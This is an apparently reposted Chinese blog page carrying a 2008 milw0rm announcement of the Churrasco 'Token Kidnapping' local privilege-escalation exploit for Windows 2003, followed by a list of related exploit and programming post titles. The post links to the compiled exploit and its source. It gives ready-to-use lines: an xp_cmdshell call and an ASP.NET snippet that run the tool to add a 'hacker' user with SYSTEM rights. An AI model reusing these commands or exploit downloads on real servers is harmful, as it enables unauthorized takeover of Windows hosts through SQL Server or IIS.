MS Windows 2003 Token Kidnapping Local Exploit PoC
来源:互联网 发布:json视图编辑器 编辑:程序博客网 时间:2024/05/17 07:33
编译好的:http://www.blogjava.net/Files/baicker/Churrasco.rar (via 009)
From:http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html
It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.
Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows
services accounts can impersonate. Other process (not services) that can impersonate are IIS 6 worker processes
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide
shared hosting services then I would recomend to not allow users to run this kind of code from ASP.
-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:
exec xp_cmdshell 'churrasco "net user /add hacker"'
-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " /"net user /add hacker/" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...
You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip
backup link: http://milw0rm.com/sploits/2008-Churrasco.zip
Enjoy.
Cesar.
# milw0rm.com [2008-10-08]
图在这里:
- MS Windows 2003 Token Kidnapping Local Exploit PoC
- Token Kidnapping Windows 2003 PoC exploit (Win2K3测试成功)
- Token Kidnapping Windows 2008 PoC exploit
- MS Windows GDI Local Privilege Escalation Exploit
- MS Windows Animated Cursor (.ANI) Local Overflow Exploit
- MS Windows DCE-RPC svcctl ChangeServiceConfig2A() 0day Memory Corruption PoC Exploit
- MS08-066 AFD.sys Local Privilege Escalation Exploit (POC)
- Microsoft Windows "keybd_event" Local Privilege Escalation Exploit
- .net exploit poc 笔记
- MS Windows Services Access List Checker / Modifier PoC
- Microsoft Windows CSRSS Local Privilege Escalation Exploit (MS05-018)
- MS Windows Telephony Service Command Execution Exploit (MS05-040)
- MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035)
- MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)
- [2000]MS Windows (Jolt2.c) Denial of Service Exploit
- Microsoft PowerPoint 2003 SP2 Local Code Execution Exploit
- IE 6.0 - Local Crash Exploit
- MS Windows Workstation Service NetrWkstaUserEnum() 0day Memory Allocation Remote DoS Exploit # Bug discovered by h07
- 模式匹配中的kmp算法
- CPL文件
- 更新整个库中所有表的指定字段名称
- MS08-052 WMF漏洞分析及漏洞测试
- MS Windows GDI+ Proof of Concept (MS08-052) #2
- MS Windows 2003 Token Kidnapping Local Exploit PoC
- ADOTestMSSQL
- ASP.NET自定义控件属性的特性大全
- VS2005:开发工具技巧荟萃(随时更新)
- XFire:轻松简单地开发Web Services
- VB.NET按字节截取字符串
- sizeof内存对齐和虚指针内存布局
- bean:write 格式化
- [分享兼散分]一个好网址,大量有用JS,代码可下载